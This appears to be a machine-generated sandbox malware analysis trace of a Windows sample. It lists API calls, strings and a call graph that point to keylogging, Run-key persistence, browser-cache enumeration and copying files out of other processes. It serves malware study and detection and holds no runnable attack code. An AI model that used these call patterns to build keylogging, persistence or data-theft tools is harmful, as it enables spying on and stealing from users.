  • Part of subcall function 00456B9D: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,004555E0,00000000,PkGNG,0044B61D,?,FF8BC35D,00000000,?,00000000), ref: 00456BB0
• WriteConsoleW.KERNEL32(FFFFFFFE,FF8BC369,00000001,00000000,00000000,00000000,PkGNG,0044B61D,?,FF8BC35D,00000000,?,00000000,PkGNG,0044BB99,?), ref: 004555FE
Strings
• API ID: ConsoleCreateFileWrite___initconout
• String ID: PkGNG
• API String ID: 3087715906-263838557
APIs
• GetKeyState.USER32(00000012), ref: 0040B6E0
Strings
• API ID: State
• String ID: [CtrlL]$[CtrlR]
• API String ID: 1649606143-2446555240
APIs
  • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
• __Init_thread_footer.LIBCMT ref: 00410F64
Strings
• API ID: Init_thread_footer__onexit
• String ID: ,kG$0kG
• API String ID: 1881088180-2015055088
APIs
• RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040D509,00000000,?,00000000), ref: 00413A6C
• RegDeleteValueW.ADVAPI32(?,?,?,00000000), ref: 00413A80
Strings
• Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413A6A
• API ID: DeleteOpenValue
• String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
• API String ID: 2654517830-1051519024
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D55), ref: 00440D77
                                                              • GetLastError.KERNEL32 ref: 00440D85
                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00440DE0
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ByteCharMultiWide$ErrorLast
                                                              • String ID:
                                                              • API String ID: 1717984340-0
                                                              • Opcode ID: aa9c90e467390f2e0f6591fe7c9965b03d9b59885bed7a4237b1e33e934d31eb
                                                              • Instruction ID: 51be13377619d21db21fabe69686c0ed70cae26876ac5a8e773c252addda8789
                                                              • Opcode Fuzzy Hash: aa9c90e467390f2e0f6591fe7c9965b03d9b59885bed7a4237b1e33e934d31eb
                                                              • Instruction Fuzzy Hash: 2D412670A00212AFEF218FA5C8447BBBBA4EF41310F2045AAFA59573E1DB399C31C759
                                                              APIs
                                                              • IsBadReadPtr.KERNEL32(?,00000014), ref: 00411BC7
                                                              • IsBadReadPtr.KERNEL32(?,00000014), ref: 00411C93
                                                              • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00411CB5
                                                              • SetLastError.KERNEL32(0000007E,00411F2B), ref: 00411CCC
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorLastRead
                                                              • String ID:
                                                              • API String ID: 4100373531-0
                                                              • Opcode ID: 90639ee29dfdd48ecb3f8d3d3319bc7730bab7022ac74643829df8c5f46e8e60
                                                              • Instruction ID: 65e884089caabfe283b2879acbb60db065d5dd9ad58be7743d127bf22715a70c
                                                              • Opcode Fuzzy Hash: 90639ee29dfdd48ecb3f8d3d3319bc7730bab7022ac74643829df8c5f46e8e60
                                                              • Instruction Fuzzy Hash: 60419D716443059FEB248F19DC84BA7B3E4FF44714F00082EEA4A876A1F738E845CB99

                                                              Execution Graph

                                                              Execution Coverage:6.2%
                                                              Dynamic/Decrypted Code Coverage:9.2%
                                                              Signature Coverage:0%
                                                              Total number of Nodes:2000
                                                              Total number of Limit Nodes:77
16 API calls 38924->38925 38926 40c2ae 38925->38926 38996 40c1d3 38926->38996 38931 40c3be 38948 40a8ab 38931->38948 38932 40afcf 2 API calls 38933 40c2fd FindFirstUrlCacheEntryW 38932->38933 38934 40c3b6 38933->38934 38935 40c31e wcschr 38933->38935 38936 40b04b ??3@YAXPAX 38934->38936 38937 40c331 38935->38937 38938 40c35e FindNextUrlCacheEntryW 38935->38938 38936->38931 38939 40a8ab 9 API calls 38937->38939 38938->38935 38940 40c373 GetLastError 38938->38940 38943 40c33e wcschr 38939->38943 38941 40c3ad FindCloseUrlCache 38940->38941 38942 40c37e 38940->38942 38941->38934 38944 40afcf 2 API calls 38942->38944 38943->38938 38945 40c34f 38943->38945 38946 40c391 FindNextUrlCacheEntryW 38944->38946 38947 40a8ab 9 API calls 38945->38947 38946->38935 38946->38941 38947->38938 39090 40a97a 38948->39090 38951 40a8cc 38951->38538 38952 40a8d0 7 API calls 38952->38951 39095 40b1ab free free 38953->39095 38955 40c3dd 38956 40b2cc 27 API calls 38955->38956 38957 40c3e7 38956->38957 39096 414592 RegOpenKeyExW 38957->39096 38959 40c3f4 38960 40c50e 38959->38960 38961 40c3ff 38959->38961 38975 405337 38960->38975 38962 40a9ce 4 API calls 38961->38962 38963 40c418 memset 38962->38963 39097 40aa1d 38963->39097 38966 40c471 38968 40c47a _wcsupr 38966->38968 38967 40c505 RegCloseKey 38967->38960 38969 40a8d0 7 API calls 38968->38969 38970 40c498 38969->38970 38971 40a8d0 7 API calls 38970->38971 38972 40c4ac memset 38971->38972 38973 40aa1d 38972->38973 38974 40c4e4 RegEnumValueW 38973->38974 38974->38967 38974->38968 39099 405220 38975->39099 38979 4099c6 2 API calls 38978->38979 38980 40a714 _wcslwr 38979->38980 38981 40c634 38980->38981 39156 405361 38981->39156 38984 40c65c wcslen 39159 4053b6 39 API calls 38984->39159 38985 40c71d wcslen 38985->38548 38987 40c713 39162 4053df 39 API calls 38987->39162 38988 40c677 38988->38987 39160 40538b 39 API calls 38988->39160 38991 40c6a5 38991->38987 38992 40c6a9 memset 38991->38992 38993 40c6d3 38992->38993 39161 40c589 43 API calls 
38993->39161 38995->38545 38997 40ae18 9 API calls 38996->38997 39003 40c210 38997->39003 38998 40ae51 9 API calls 38998->39003 38999 40c264 39000 40aebe FindClose 38999->39000 39002 40c26f 39000->39002 39001 40add4 2 API calls 39001->39003 39008 40e5ed memset memset 39002->39008 39003->38998 39003->38999 39003->39001 39004 40c231 _wcsicmp 39003->39004 39005 40c1d3 35 API calls 39003->39005 39004->39003 39006 40c248 39004->39006 39005->39003 39021 40c084 22 API calls 39006->39021 39009 414c2e 16 API calls 39008->39009 39010 40e63f 39009->39010 39011 409d1f 6 API calls 39010->39011 39012 40e658 39011->39012 39022 409b98 GetFileAttributesW 39012->39022 39014 40e667 39015 40e680 39014->39015 39017 409d1f 6 API calls 39014->39017 39023 409b98 GetFileAttributesW 39015->39023 39017->39015 39018 40e68f 39019 40c2d8 39018->39019 39024 40e4b2 39018->39024 39019->38931 39019->38932 39021->39003 39022->39014 39023->39018 39045 40e01e 39024->39045 39026 40e593 39028 40e5b0 39026->39028 39029 40e59c DeleteFileW 39026->39029 39027 40e521 39027->39026 39068 40e175 39027->39068 39030 40b04b ??3@YAXPAX 39028->39030 39029->39028 39031 40e5bb 39030->39031 39033 40e5c4 CloseHandle 39031->39033 39034 40e5cc 39031->39034 39033->39034 39036 40b633 free 39034->39036 39035 40e573 39037 40e584 39035->39037 39038 40e57c CloseHandle 39035->39038 39039 40e5db 39036->39039 39089 40b1ab free free 39037->39089 39038->39037 39042 40b633 free 39039->39042 39041 40e540 39041->39035 39088 40e2ab 30 API calls 39041->39088 39043 40e5e3 39042->39043 39043->39019 39046 406214 22 API calls 39045->39046 39047 40e03c 39046->39047 39048 40e16b 39047->39048 39049 40dd85 74 API calls 39047->39049 39048->39027 39050 40e06b 39049->39050 39050->39048 39051 40afcf ??2@YAPAXI ??3@YAXPAX 39050->39051 39052 40e08d OpenProcess 39051->39052 39053 40e0a4 GetCurrentProcess DuplicateHandle 39052->39053 39057 40e152 39052->39057 39054 40e0d0 GetFileSize 39053->39054 39055 40e14a CloseHandle 39053->39055 39058 409a45 
GetTempPathW GetWindowsDirectoryW GetTempFileNameW 39054->39058 39055->39057 39056 40e160 39060 40b04b ??3@YAXPAX 39056->39060 39057->39056 39059 406214 22 API calls 39057->39059 39061 40e0ea 39058->39061 39059->39056 39060->39048 39062 4096dc CreateFileW 39061->39062 39063 40e0f1 CreateFileMappingW 39062->39063 39064 40e140 CloseHandle CloseHandle 39063->39064 39065 40e10b MapViewOfFile 39063->39065 39064->39055 39066 40e13b CloseHandle 39065->39066 39067 40e11f WriteFile UnmapViewOfFile 39065->39067 39066->39064 39067->39066 39069 40e18c 39068->39069 39070 406b90 11 API calls 39069->39070 39071 40e19f 39070->39071 39072 40e1a7 memset 39071->39072 39073 40e299 39071->39073 39078 40e1e8 39072->39078 39074 4069a3 ??3@YAXPAX free 39073->39074 39075 40e2a4 39074->39075 39075->39041 39076 406e8f 13 API calls 39076->39078 39077 406b53 SetFilePointerEx ReadFile 39077->39078 39078->39076 39078->39077 39079 40e283 39078->39079 39080 40dd50 _wcsicmp 39078->39080 39084 40742e 8 API calls 39078->39084 39085 40aae3 wcslen wcslen _memicmp 39078->39085 39086 40e244 _snwprintf 39078->39086 39081 40e291 39079->39081 39082 40e288 free 39079->39082 39080->39078 39083 40aa04 free 39081->39083 39082->39081 39083->39073 39084->39078 39085->39078 39087 40a8d0 7 API calls 39086->39087 39087->39078 39088->39041 39089->39026 39092 40a980 39090->39092 39091 40a8bb 39091->38951 39091->38952 39092->39091 39093 40a995 _wcsicmp 39092->39093 39094 40a99c wcscmp 39092->39094 39093->39092 39094->39092 39095->38955 39096->38959 39098 40aa23 RegEnumValueW 39097->39098 39098->38966 39098->38967 39100 405335 39099->39100 39101 40522a 39099->39101 39100->38548 39102 40b2cc 27 API calls 39101->39102 39103 405234 39102->39103 39104 40a804 8 API calls 39103->39104 39105 40523a 39104->39105 39144 40b273 39105->39144 39107 405248 _mbscpy _mbscat GetProcAddress 39108 40b273 27 API calls 39107->39108 39109 405279 39108->39109 39147 405211 GetProcAddress 39109->39147 39111 405282 39112 40b273 27 API calls 
39111->39112 39113 40528f 39112->39113 39148 405211 GetProcAddress 39113->39148 39115 405298 39116 40b273 27 API calls 39115->39116 39117 4052a5 39116->39117 39149 405211 GetProcAddress 39117->39149 39119 4052ae 39120 40b273 27 API calls 39119->39120 39121 4052bb 39120->39121 39150 405211 GetProcAddress 39121->39150 39123 4052c4 39124 40b273 27 API calls 39123->39124 39125 4052d1 39124->39125 39151 405211 GetProcAddress 39125->39151 39127 4052da 39128 40b273 27 API calls 39127->39128 39129 4052e7 39128->39129 39152 405211 GetProcAddress 39129->39152 39131 4052f0 39132 40b273 27 API calls 39131->39132 39133 4052fd 39132->39133 39153 405211 GetProcAddress 39133->39153 39135 405306 39136 40b273 27 API calls 39135->39136 39137 405313 39136->39137 39154 405211 GetProcAddress 39137->39154 39139 40531c 39140 40b273 27 API calls 39139->39140 39141 405329 39140->39141 39155 405211 GetProcAddress 39141->39155 39143 405332 39143->39100 39145 40b58d 27 API calls 39144->39145 39146 40b18c 39145->39146 39146->39107 39147->39111 39148->39115 39149->39119 39150->39123 39151->39127 39152->39131 39153->39135 39154->39139 39155->39143 39157 405220 39 API calls 39156->39157 39158 405369 39157->39158 39158->38984 39158->38985 39159->38988 39160->38991 39161->38987 39162->38985 39164 40440c FreeLibrary 39163->39164 39165 40436d 39164->39165 39166 40a804 8 API calls 39165->39166 39167 404377 39166->39167 39168 404383 39167->39168 39169 404405 39167->39169 39170 40b273 27 API calls 39168->39170 39169->38557 39169->38559 39169->38560 39171 40438d GetProcAddress 39170->39171 39172 40b273 27 API calls 39171->39172 39173 4043a7 GetProcAddress 39172->39173 39174 40b273 27 API calls 39173->39174 39175 4043ba GetProcAddress 39174->39175 39176 40b273 27 API calls 39175->39176 39177 4043ce GetProcAddress 39176->39177 39178 40b273 27 API calls 39177->39178 39179 4043e2 GetProcAddress 39178->39179 39180 4043f1 39179->39180 39181 4043f7 39180->39181 39182 40440c FreeLibrary 39180->39182 39181->39169 
39182->39169 39184 404413 FreeLibrary 39183->39184 39185 40441e 39183->39185 39184->39185 39185->38574 39186->38565 39188 40442e 39187->39188 39189 40447e 39187->39189 39190 40b2cc 27 API calls 39188->39190 39189->38565 39191 404438 39190->39191 39192 40a804 8 API calls 39191->39192 39193 40443e 39192->39193 39194 404445 39193->39194 39195 404467 39193->39195 39196 40b273 27 API calls 39194->39196 39195->39189 39197 404475 FreeLibrary 39195->39197 39198 40444f GetProcAddress 39196->39198 39197->39189 39198->39195 39199 404460 39198->39199 39199->39195 39201 4135f6 39200->39201 39202 4135eb FreeLibrary 39200->39202 39201->38577 39202->39201 39204 4449c4 39203->39204 39205 444a52 39203->39205 39206 40b2cc 27 API calls 39204->39206 39205->38594 39205->38595 39207 4449cb 39206->39207 39208 40a804 8 API calls 39207->39208 39209 4449d1 39208->39209 39210 40b273 27 API calls 39209->39210 39211 4449dc GetProcAddress 39210->39211 39212 40b273 27 API calls 39211->39212 39213 4449f3 GetProcAddress 39212->39213 39214 40b273 27 API calls 39213->39214 39215 444a04 GetProcAddress 39214->39215 39216 40b273 27 API calls 39215->39216 39217 444a15 GetProcAddress 39216->39217 39218 40b273 27 API calls 39217->39218 39219 444a26 GetProcAddress 39218->39219 39220 40b273 27 API calls 39219->39220 39221 444a37 GetProcAddress 39220->39221 39222 40b273 27 API calls 39221->39222 39223 444a48 GetProcAddress 39222->39223 39223->39205 39224->38605 39225->38605 39226->38605 39227->38605 39228->38596 39230 403a29 39229->39230 39244 403bed memset memset 39230->39244 39232 403ae7 39257 40b1ab free free 39232->39257 39233 403a3f memset 39239 403a2f 39233->39239 39235 403aef 39235->38612 39236 409b98 GetFileAttributesW 39236->39239 39237 40a8d0 7 API calls 39237->39239 39238 409d1f 6 API calls 39238->39239 39239->39232 39239->39233 39239->39236 39239->39237 39239->39238 39241 40a051 GetFileTime CloseHandle 39240->39241 39242 4039ca CompareFileTime 39240->39242 39241->39242 39242->38612 39243->38613 
39245 414c2e 16 API calls 39244->39245 39246 403c38 39245->39246 39247 409719 2 API calls 39246->39247 39248 403c3f wcscat 39247->39248 39249 414c2e 16 API calls 39248->39249 39250 403c61 39249->39250 39251 409719 2 API calls 39250->39251 39252 403c68 wcscat 39251->39252 39258 403af5 39252->39258 39255 403af5 20 API calls 39256 403c95 39255->39256 39256->39239 39257->39235 39259 403b02 39258->39259 39260 40ae18 9 API calls 39259->39260 39268 403b37 39260->39268 39261 403bdb 39263 40aebe FindClose 39261->39263 39262 40add4 wcscmp wcscmp 39262->39268 39264 403be6 39263->39264 39264->39255 39265 40ae18 9 API calls 39265->39268 39266 40ae51 9 API calls 39266->39268 39267 40aebe FindClose 39267->39268 39268->39261 39268->39262 39268->39265 39268->39266 39268->39267 39269 40a8d0 7 API calls 39268->39269 39269->39268 39271 409d1f 6 API calls 39270->39271 39272 404190 39271->39272 39285 409b98 GetFileAttributesW 39272->39285 39274 40419c 39275 4041a7 6 API calls 39274->39275 39276 40435c 39274->39276 39278 40424f 39275->39278 39276->38639 39278->39276 39279 40425e memset 39278->39279 39281 409d1f 6 API calls 39278->39281 39282 40a8ab 9 API calls 39278->39282 39286 414842 39278->39286 39279->39278 39280 404296 wcscpy 39279->39280 39280->39278 39281->39278 39283 4042b6 memset memset _snwprintf wcscpy 39282->39283 39283->39278 39284->38637 39285->39274 39289 41443e 39286->39289 39288 414866 39288->39278 39290 41444b 39289->39290 39291 414451 39290->39291 39292 4144a3 GetPrivateProfileStringW 39290->39292 39293 414491 39291->39293 39294 414455 wcschr 39291->39294 39292->39288 39295 414495 WritePrivateProfileStringW 39293->39295 39294->39293 39296 414463 _snwprintf 39294->39296 39295->39288 39296->39295 39297->38643 39299 40b2cc 27 API calls 39298->39299 39300 409615 39299->39300 39301 409d1f 6 API calls 39300->39301 39302 409625 39301->39302 39327 409b98 GetFileAttributesW 39302->39327 39304 409634 39305 409648 39304->39305 39328 4091b8 memset 39304->39328 39307 40b2cc 27 API 
calls 39305->39307 39309 408801 39305->39309 39308 40965d 39307->39308 39310 409d1f 6 API calls 39308->39310 39309->38646 39309->38647 39311 40966d 39310->39311 39380 409b98 GetFileAttributesW 39311->39380 39313 40967c 39313->39309 39314 409681 39313->39314 39381 409529 72 API calls 39314->39381 39316 409690 39316->39309 39317->38669 39318->38646 39319->38674 39320->38646 39327->39304 39382 40a6e6 WideCharToMultiByte 39328->39382 39330 409202 39383 444432 39330->39383 39333 40b273 27 API calls 39334 409236 39333->39334 39429 438552 39334->39429 39337 409383 39339 40b273 27 API calls 39337->39339 39341 409399 39339->39341 39340 409254 39342 40937b 39340->39342 39450 4253cf 17 API calls 39340->39450 39343 438552 134 API calls 39341->39343 39454 424f26 123 API calls 39342->39454 39361 4093a3 39343->39361 39346 409267 39451 4253cf 17 API calls 39346->39451 39347 4094ff 39458 443d90 39347->39458 39350 4251c4 137 API calls 39350->39361 39352 409507 39360 40951d 39352->39360 39478 408f2f 77 API calls 39352->39478 39354 4093df 39457 424f26 123 API calls 39354->39457 39358 4253cf 17 API calls 39358->39361 39360->39305 39361->39347 39361->39350 39361->39354 39361->39358 39363 4093e4 39361->39363 39455 4253af 17 API calls 39363->39455 39370 4093ed 39456 4253af 17 API calls 39370->39456 39373 4093f9 39373->39354 39374 409409 memcmp 39373->39374 39374->39354 39375 409421 memcmp 39374->39375 39376 4094a4 memcmp 39375->39376 39377 409435 39375->39377 39376->39354 39377->39354 39380->39313 39381->39316 39382->39330 39479 4438b5 39383->39479 39385 44444c 39391 409215 39385->39391 39493 415a6d 39385->39493 39387 4442e6 11 API calls 39389 44469e 39387->39389 39388 444486 39390 4444b9 memcpy 39388->39390 39428 4444a4 39388->39428 39389->39391 39393 443d90 111 API calls 39389->39393 39497 415258 39390->39497 39391->39333 39391->39360 39393->39391 39394 444524 39395 444541 39394->39395 39396 44452a 39394->39396 39500 444316 39395->39500 39397 416935 16 API calls 39396->39397 
39397->39428 39400 444316 18 API calls 39401 444563 39400->39401 39402 444316 18 API calls 39401->39402 39403 44456f 39402->39403 39404 444316 18 API calls 39403->39404 39405 44457f 39404->39405 39405->39428 39514 432d4e 39405->39514 39428->39387 39567 438460 39429->39567 39431 409240 39431->39337 39432 4251c4 39431->39432 39579 424f07 39432->39579 39434 4251e4 39435 4251f7 39434->39435 39436 4251e8 39434->39436 39587 4250f8 39435->39587 39586 4446ea 11 API calls 39436->39586 39438 4251f2 39438->39340 39440 425209 39443 425249 39440->39443 39446 4250f8 127 API calls 39440->39446 39447 425287 39440->39447 39595 4384e9 135 API calls 39440->39595 39596 424f74 124 API calls 39440->39596 39443->39447 39446->39440 39450->39346 39454->39337 39455->39370 39456->39373 39457->39347 39459 443da3 39458->39459 39460 443db6 39458->39460 39603 41707a 11 API calls 39459->39603 39460->39352 39462 443da8 39463 443dbc 39462->39463 39464 443dac 39462->39464 39605 4300e8 memset memset memcpy 39463->39605 39604 4446ea 11 API calls 39464->39604 39478->39360 39480 4438d0 39479->39480 39491 4438c9 39479->39491 39481 415378 memcpy memcpy 39480->39481 39482 4438d5 39481->39482 39483 4154e2 10 API calls 39482->39483 39484 443906 39482->39484 39482->39491 39483->39484 39485 443970 memset 39484->39485 39484->39491 39487 44398b 39485->39487 39486 4439a0 39488 415700 10 API calls 39486->39488 39486->39491 39487->39486 39490 41975c 10 API calls 39487->39490 39489 4439c0 39488->39489 39489->39491 39492 418981 10 API calls 39489->39492 39490->39486 39491->39385 39492->39491 39494 415a77 39493->39494 39495 415a8d 39494->39495 39496 415a7e memset 39494->39496 39495->39388 39496->39495 39498 4438b5 11 API calls 39497->39498 39499 41525d 39498->39499 39499->39394 39501 444328 39500->39501 39502 444423 39501->39502 39503 44434e 39501->39503 39504 4446ea 11 API calls 39502->39504 39505 432d4e memset memset memcpy 39503->39505 39511 444381 39504->39511 39506 44435a 39505->39506 39508 444375 39506->39508 
39513 44438b 39506->39513 39507 432d4e memset memset memcpy 39509 4443ec 39507->39509 39510 416935 16 API calls 39508->39510 39509->39511 39512 416935 16 API calls 39509->39512 39510->39511 39511->39400 39512->39511 39513->39507 39515 432d65 39514->39515 39516 432d58 39514->39516 39568 41703f 11 API calls 39567->39568 39569 43847a 39568->39569 39570 43848a 39569->39570 39571 43847e 39569->39571 39573 438270 134 API calls 39570->39573 39572 4446ea 11 API calls 39571->39572 39575 438488 39572->39575 39574 4384aa 39573->39574 39574->39575 39576 424f26 123 API calls 39574->39576 39575->39431 39577 4384bb 39576->39577 39578 438270 134 API calls 39577->39578 39578->39575 39580 424f1f 39579->39580 39581 424f0c 39579->39581 39583 424eea 11 API calls 39580->39583 39582 416760 11 API calls 39581->39582 39584 424f18 39582->39584 39585 424f24 39583->39585 39584->39434 39585->39434 39586->39438 39588 425108 39587->39588 39594 42510d 39587->39594 39589 424f74 124 API calls 39588->39589 39589->39594 39590 42569b 125 API calls 39591 42516e 39590->39591 39593 415c7d 16 API calls 39591->39593 39592 425115 39592->39440 39593->39592 39594->39590 39594->39592 39595->39440 39596->39440 39603->39462 39604->39460 39636 413f4f 39609->39636 39612 413f37 K32GetModuleFileNameExW 39613 413f4a 39612->39613 39613->38705 39615 413969 wcscpy 39614->39615 39616 41396c wcschr 39614->39616 39628 413a3a 39615->39628 39616->39615 39618 41398e 39616->39618 39641 4097f7 wcslen wcslen _memicmp 39618->39641 39620 41399a 39621 4139a4 memset 39620->39621 39622 4139e6 39620->39622 39642 409dd5 GetWindowsDirectoryW wcscpy 39621->39642 39624 413a31 wcscpy 39622->39624 39625 4139ec memset 39622->39625 39624->39628 39643 409dd5 GetWindowsDirectoryW wcscpy 39625->39643 39626 4139c9 wcscpy wcscat 39626->39628 39628->38705 39629 413a11 memcpy wcscat 39629->39628 39631 413cb0 GetModuleHandleW 39630->39631 39632 413cda 39630->39632 39631->39632 39633 413cbf GetProcAddress 39631->39633 39634 413ce3 GetProcessTimes 
39632->39634 39635 413cf6 39632->39635 39633->39632 39634->38708 39635->38708 39637 413f2f 39636->39637 39638 413f54 39636->39638 39637->39612 39637->39613 39639 40a804 8 API calls 39638->39639 39640 413f5f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 39639->39640 39640->39637 39641->39620 39642->39626 39643->39629 39644->38729 39645->38752 39647 409cf9 GetVersionExW 39646->39647 39648 409d0a 39646->39648 39647->39648 39648->38758 39648->38763 39649->38764 39650->38767 39651->38769 39652->38835 39654 40bba5 39653->39654 39701 40cc26 39654->39701 39657 40bd4b 39722 40cc0c 39657->39722 39662 40b2cc 27 API calls 39663 40bbef 39662->39663 39729 40ccf0 _wcsicmp 39663->39729 39665 40bbf5 39665->39657 39730 40ccb4 6 API calls 39665->39730 39667 40bc26 39668 40cf04 17 API calls 39667->39668 39669 40bc2e 39668->39669 39670 40bd43 39669->39670 39671 40b2cc 27 API calls 39669->39671 39672 40cc0c 4 API calls 39670->39672 39673 40bc40 39671->39673 39672->39657 39731 40ccf0 _wcsicmp 39673->39731 39675 40bc46 39675->39670 39676 40bc61 memset memset WideCharToMultiByte 39675->39676 39732 40103c strlen 39676->39732 39678 40bcc0 39679 40b273 27 API calls 39678->39679 39680 40bcd0 memcmp 39679->39680 39680->39670 39681 40bce2 39680->39681 39682 404423 37 API calls 39681->39682 39683 40bd10 39682->39683 39683->39670 39684 40bd3a LocalFree 39683->39684 39685 40bd1f memcpy 39683->39685 39684->39670 39685->39684 39686->38850 39688 409a74 GetTempFileNameW 39687->39688 39689 409a66 GetWindowsDirectoryW 39687->39689 39688->38849 39689->39688 39690->38887 39691->38887 39692->38887 39693->38887 39694->38887 39695->38887 39696->38887 39697->38887 39698->38887 39699->38862 39700->38884 39733 4096c3 CreateFileW 39701->39733 39703 40cc34 39704 40cc3d GetFileSize 39703->39704 39712 40bbca 39703->39712 39705 40afcf 2 API calls 39704->39705 39706 40cc64 39705->39706 39734 40a2ef ReadFile 39706->39734 39708 40cc71 39735 40ab4a MultiByteToWideChar 39708->39735 39710 
40cc95 CloseHandle 39711 40b04b ??3@YAXPAX 39710->39711 39711->39712 39712->39657 39713 40cf04 39712->39713 39714 40b633 free 39713->39714 39715 40cf14 39714->39715 39741 40b1ab free free 39715->39741 39717 40bbdd 39717->39657 39717->39662 39718 40cf1b 39718->39717 39720 40cfef 39718->39720 39742 40cd4b 39718->39742 39721 40cd4b 14 API calls 39720->39721 39721->39717 39723 40b633 free 39722->39723 39724 40cc15 39723->39724 39725 40aa04 free 39724->39725 39726 40cc1d 39725->39726 39791 40b1ab free free 39726->39791 39728 40b7d4 memset CreateFileW 39728->38842 39728->38843 39729->39665 39730->39667 39731->39675 39732->39678 39733->39703 39734->39708 39736 40ab93 39735->39736 39737 40ab6b 39735->39737 39736->39710 39738 40a9ce 4 API calls 39737->39738 39739 40ab74 39738->39739 39740 40ab7c MultiByteToWideChar 39739->39740 39740->39736 39741->39718 39743 40cd7b 39742->39743 39776 40aa29 39743->39776 39745 40cef5 39746 40aa04 free 39745->39746 39747 40cefd 39746->39747 39747->39718 39749 40aa29 6 API calls 39750 40ce1d 39749->39750 39751 40aa29 6 API calls 39750->39751 39752 40ce3e 39751->39752 39753 40ce6a 39752->39753 39784 40abb7 wcslen memmove 39752->39784 39754 40ce9f 39753->39754 39787 40abb7 wcslen memmove 39753->39787 39756 40a8d0 7 API calls 39754->39756 39759 40ceb5 39756->39759 39757 40ce56 39785 40aa71 wcslen 39757->39785 39765 40a8d0 7 API calls 39759->39765 39761 40ce8b 39788 40aa71 wcslen 39761->39788 39762 40ce5e 39786 40abb7 wcslen memmove 39762->39786 39768 40cecb 39765->39768 39766 40ce93 39789 40abb7 wcslen memmove 39766->39789 39790 40d00b malloc memcpy free free 39768->39790 39770 40cedd 39771 40aa04 free 39770->39771 39772 40cee5 39771->39772 39773 40aa04 free 39772->39773 39774 40ceed 39773->39774 39775 40aa04 free 39774->39775 39775->39745 39777 40aa33 39776->39777 39778 40aa63 39776->39778 39779 40aa44 39777->39779 39780 40aa38 wcslen 39777->39780 39778->39745 39778->39749 39781 40a9ce malloc memcpy free free 39779->39781 39780->39779 39782 
40aa4d 39781->39782 39782->39778 39783 40aa51 memcpy 39782->39783 39783->39778 39784->39757 39785->39762 39786->39753 39787->39761 39788->39766 39789->39754 39790->39770 39791->39728 39792->38902 39793->38910 39803 44def7 39804 44df07 39803->39804 39805 44df00 ??3@YAXPAX 39803->39805 39806 44df17 39804->39806 39807 44df10 ??3@YAXPAX 39804->39807 39805->39804 39808 44df27 39806->39808 39809 44df20 ??3@YAXPAX 39806->39809 39807->39806 39810 44df37 39808->39810 39811 44df30 ??3@YAXPAX 39808->39811 39809->39808 39811->39810 37668 44dea5 37669 44deb5 FreeLibrary 37668->37669 37670 44dec3 37668->37670 37669->37670 39812 4148b6 FindResourceW 39813 4148cf SizeofResource 39812->39813 39816 4148f9 39812->39816 39814 4148e0 LoadResource 39813->39814 39813->39816 39815 4148ee LockResource 39814->39815 39814->39816 39815->39816 37847 415304 free 39817 441b3f 39827 43a9f6 39817->39827 39819 441b61 40000 4386af memset 39819->40000 39821 44189a 39822 4418e2 39821->39822 39826 442bd4 39821->39826 39823 4418ea 39822->39823 40001 4414a9 12 API calls 39822->40001 39826->39823 40002 441409 memset 39826->40002 39828 43aa20 39827->39828 39829 43aadf 39827->39829 39828->39829 39830 43aa34 memset 39828->39830 39829->39819 39831 43aa56 39830->39831 39832 43aa4d 39830->39832 40003 43a6e7 39831->40003 40011 42c02e memset 39832->40011 39837 43aad3 40013 4169a7 11 API calls 39837->40013 39838 43aaae 39838->39829 39838->39837 39853 43aae5 39838->39853 39839 43ac18 39842 43ac47 39839->39842 40015 42bbd5 memcpy memcpy memcpy memset memcpy 39839->40015 39843 43aca8 39842->39843 40016 438eed 16 API calls 39842->40016 39846 43acd5 39843->39846 40018 4233ae 11 API calls 39843->40018 40019 423426 11 API calls 39846->40019 39847 43ac87 40017 4233c5 16 API calls 39847->40017 39851 43ace1 40020 439811 163 API calls 39851->40020 39852 43a9f6 161 API calls 39852->39853 39853->39829 39853->39839 39853->39852 40014 439bbb 22 API calls 39853->40014 39855 43acfd 39861 43ad2c 39855->39861 40021 438eed 16 API 
calls 39855->40021 39857 43ad19 40022 4233c5 16 API calls 39857->40022 39858 43ad58 40023 44081d 163 API calls 39858->40023 39861->39858 39864 43add9 39861->39864 39863 43ae3a memset 39865 43ae73 39863->39865 39864->39864 40027 423426 11 API calls 39864->40027 40028 42e1c0 147 API calls 39865->40028 39866 43adab 40025 438c4e 163 API calls 39866->40025 39869 43ad6c 39869->39829 39869->39866 40024 42370b memset memcpy memset 39869->40024 39870 43adcc 40026 440f84 12 API calls 39870->40026 39871 43ae96 40029 42e1c0 147 API calls 39871->40029 39875 43aea8 39876 43aec1 39875->39876 40030 42e199 147 API calls 39875->40030 39877 43af00 39876->39877 40031 42e1c0 147 API calls 39876->40031 39877->39829 39881 43af1a 39877->39881 39882 43b3d9 39877->39882 40032 438eed 16 API calls 39881->40032 39887 43b3f6 39882->39887 39891 43b4c8 39882->39891 39884 43b60f 39884->39829 40091 4393a5 17 API calls 39884->40091 39885 43af2f 40033 4233c5 16 API calls 39885->40033 40073 432878 12 API calls 39887->40073 39889 43af51 40034 423426 11 API calls 39889->40034 39897 43b4f2 39891->39897 40079 42bbd5 memcpy memcpy memcpy memset memcpy 39891->40079 39893 